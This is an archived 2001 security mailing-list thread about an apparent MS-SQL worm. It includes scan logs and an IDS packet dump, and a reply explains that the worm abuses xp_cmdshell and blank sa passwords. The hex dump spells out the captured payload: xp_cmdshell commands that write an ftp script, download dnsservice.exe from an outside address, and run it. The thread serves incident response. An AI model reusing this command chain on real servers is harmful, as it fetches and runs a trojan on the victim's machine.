Hi, This is an exploit for a default MS SQL installation. If you check your trace it calls xp_cmdshell (which enables anyone to run a dos command directly from MSSQL, much like 'system' under Unix). It ftp's a trojan from foo.com (dnsservice.exe) and executes it. (after glancing through your log). You probably have a default MSSQL 7 installation with TCPIP connectivity that has an sa account with an empty password. better disconnect and clean up Arthur ----- Original Message ----- From: "Douglas P. Brown" <dugbrownat_private> To: <incidentsat_private>; <unisogat_private> Cc: "ITS Security" <securityat_private> Sent: Tuesday, November 20, 2001 3:54 PM Subject: MS-SQL Worm? > > We saw a scan come in looking for systems answering on 1433, and > immediately saw several systems start scanning out for other systems > answering on 1433 - worm behavior? Has anyone else seen this? > > thanks, > -Doug > -- > Douglas P. Brown > University of North Carolina > Manager of Security Resources > 105 Abernethy Hall > > > Nov 20 09:38:19 x.x.92.228:2884 -> x.x.90.70:1433 SYN ******S* > Nov 20 09:38:19 x.x.92.228:2886 -> x.x.92.70:1433 SYN ******S* > Nov 20 09:38:20 x.x.202.182:2503 -> x.x.73.109:1433 SYN ******S* > Nov 20 09:38:20 x.x.202.182:2507 -> x.x.77.109:1433 SYN ******S* > Nov 20 09:38:20 x.x.202.182:2506 -> x.x.76.109:1433 SYN ******S* > Nov 20 09:38:20 x.x.202.182:2528 -> x.x.96.109:1433 SYN ******S* > Nov 20 09:38:21 x.x.92.228:2904 -> x.x.110.70:1433 SYN ******S* > Nov 20 09:38:21 x.x.92.228:2905 -> x.x.111.70:1433 SYN ******S* > Nov 20 09:38:21 x.x.92.228:2906 -> x.x.112.70:1433 SYN ******S* > Nov 20 09:38:21 x.x.92.228:2907 -> x.x.113.70:1433 SYN ******S* > Nov 20 09:38:21 x.x.92.228:2909 -> x.x.115.70:1433 SYN ******S* > Nov 20 09:38:21 x.x.92.228:2908 -> x.x.114.70:1433 SYN ******S* > Nov 20 09:38:21 x.x.92.228:2910 -> x.x.116.70:1433 SYN ******S* > Nov 20 09:38:22 x.x.92.228:2911 -> x.x.117.70:1433 SYN ******S* > Nov 20 09:38:22 x.x.92.228:2913 -> x.x.119.70:1433 SYN ******S* > Nov 20 09:38:22 x.x.92.228:2912 -> x.x.118.70:1433 SYN ******S* > Nov 20 09:38:22 x.x.92.228:2915 -> x.x.121.70:1433 SYN ******S* > Nov 20 09:38:22 x.x.92.228:2914 -> x.x.120.70:1433 SYN ******S* > Nov 20 09:38:22 x.x.92.228:2916 -> x.x.122.70:1433 SYN ******S* > Nov 20 09:38:22 x.x.92.228:2917 -> x.x.123.70:1433 SYN ******S* > Nov 20 09:38:21 x.x.202.182:2532 -> x.x.99.109:1433 SYN ******S* > Nov 20 09:38:21 x.x.202.182:2533 -> x.x.100.109:1433 SYN ******S* > Nov 20 09:38:21 x.x.202.182:2535 -> x.x.102.109:1433 SYN ******S* > Nov 20 09:38:21 x.x.202.182:2538 -> x.x.105.109:1433 SYN ******S* > Nov 20 09:38:21 x.x.202.182:2539 -> x.x.106.109:1433 SYN ******S* > > [**] MS-SQL xp_cmdshell - program execution [**] > 11/20-08:01:48.923210 x.x.92.228:3348 -> x.x.200.115:1433 > TCP TTL:127 TOS:0x0 ID:45385 IpLen:20 DgmLen:972 DF > ***AP*** Seq: 0x318F3D1 Ack: 0x1E5807AD Win: 0x2098 TcpLen: 20 > 03 01 03 A4 00 00 01 00 0A 00 73 00 70 00 5F 00 ..........s.p._. > 70 00 72 00 65 00 70 00 61 00 72 00 65 00 00 00 p.r.e.p.a.r.e... > 00 01 26 04 00 00 00 63 00 00 00 00 FF FF FF FF ..&....c........ > 00 00 63 62 03 00 00 62 03 00 00 65 00 78 00 65 ..cb...b...e.x.e > 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64 .c. .x.p._.c.m.d > 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65 .s.h.e.l.l. .'.e > 00 63 00 68 00 6F 00 20 00 66 00 74 00 70 00 3E .c.h.o. .f.t.p.> > 00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A . .f.t.p...x.'.. > 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00 5F .e.x.e.c. .x.p._ > 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00 6C .c.m.d.s.h.e.l.l > 00 20 00 27 00 65 00 63 00 68 00 6F 00 20 00 66 . .'.e.c.h.o. .f > 00 6F 00 6F 00 2E 00 63 00 6F 00 6D 00 3E 00 3E .o.o...c.o.m.>.> > 00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A . .f.t.p...x.'.. > 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00 5F .e.x.e.c. .x.p._ > 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00 6C .c.m.d.s.h.e.l.l > 00 20 00 27 00 65 00 63 00 68 00 6F 00 20 00 62 . .'.e.c.h.o. .b > 00 69 00 6E 00 3E 00 3E 00 20 00 66 00 74 00 70 .i.n.>.>. .f.t.p > 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65 00 63 ...x.'...e.x.e.c > 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73 . .x.p._.c.m.d.s > 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63 .h.e.l.l. .'.e.c > 00 68 00 6F 00 20 00 63 00 64 00 20 00 70 00 75 .h.o. .c.d. .p.u > 00 62 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E .b.>.>. .f.t.p.. > 00 78 00 27 00 0A 00 65 00 78 00 65 00 63 00 20 .x.'...e.x.e.c. > 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68 .x.p._.c.m.d.s.h > 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63 00 68 .e.l.l. .'.e.c.h > 00 6F 00 20 00 63 00 64 00 20 00 74 00 6D 00 70 .o. .c.d. .t.m.p > 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E 00 78 .>.>. .f.t.p...x > 00 27 00 0A 00 65 00 78 00 65 00 63 00 20 00 78 .'...e.x.e.c. .x > 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65 .p._.c.m.d.s.h.e > 00 6C 00 6C 00 20 00 27 00 65 00 63 00 68 00 6F .l.l. .'.e.c.h.o > 00 20 00 67 00 65 00 74 00 20 00 64 00 6E 00 73 . .g.e.t. .d.n.s > 00 73 00 65 00 72 00 76 00 69 00 63 00 65 00 2E .s.e.r.v.i.c.e.. > 00 65 00 78 00 65 00 3E 00 3E 00 20 00 66 00 74 .e.x.e.>.>. .f.t > 00 70 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65 .p...x.'...e.x.e > 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64 .c. .x.p._.c.m.d > 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65 .s.h.e.l.l. .'.e > 00 63 00 68 00 6F 00 20 00 63 00 6C 00 6F 00 73 .c.h.o. .c.l.o.s > 00 65 00 20 00 3E 00 3E 00 20 00 66 00 74 00 70 .e. .>.>. .f.t.p > 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65 00 63 ...x.'...e.x.e.c > 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73 . .x.p._.c.m.d.s > 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63 .h.e.l.l. .'.e.c > 00 68 00 6F 00 20 00 71 00 75 00 69 00 74 00 20 .h.o. .q.u.i.t. > 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E 00 78 .>.>. .f.t.p...x > 00 27 00 0A 00 65 00 78 00 65 00 63 00 20 00 78 .'...e.x.e.c. .x > 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65 .p._.c.m.d.s.h.e > 00 6C 00 6C 00 20 00 27 00 66 00 74 00 70 00 20 .l.l. .'.f.t.p. > 00 2D 00 73 00 3A 00 66 00 74 00 70 00 2E 00 78 .-.s.:.f.t.p...x > 00 20 00 32 00 30 00 37 00 2E 00 32 00 39 00 2E . .2.0.7...2.9.. > 00 31 00 39 00 32 00 2E 00 31 00 36 00 30 00 27 .1.9.2...1.6.0.' > 00 0A 00 65 00 78 00 65 00 63 00 20 00 78 00 70 ...e.x.e.c. .x.p > 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C ._.c.m.d.s.h.e.l > 00 6C 00 20 00 27 00 64 00 65 00 6C 00 20 00 66 .l. .'.d.e.l. .f > 00 74 00 70 00 2E 00 78 00 27 00 0A 00 65 00 78 .t.p...x.'...e.x > 00 65 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D .e.c. .x.p._.c.m > 00 64 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 .d.s.h.e.l.l. .' > 00 73 00 74 00 61 00 72 00 74 00 20 00 64 00 6E .s.t.a.r.t. .d.n > 00 73 00 73 00 65 00 72 00 76 00 69 00 63 00 65 .s.s.e.r.v.i.c.e > 00 2E 00 65 00 78 00 65 00 27 00 0A 00 00 00 38 ...e.x.e.'.....8 > 01 00 00 00 .... > > -------------------------------------------------------------------------- -- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 11:18:53 PST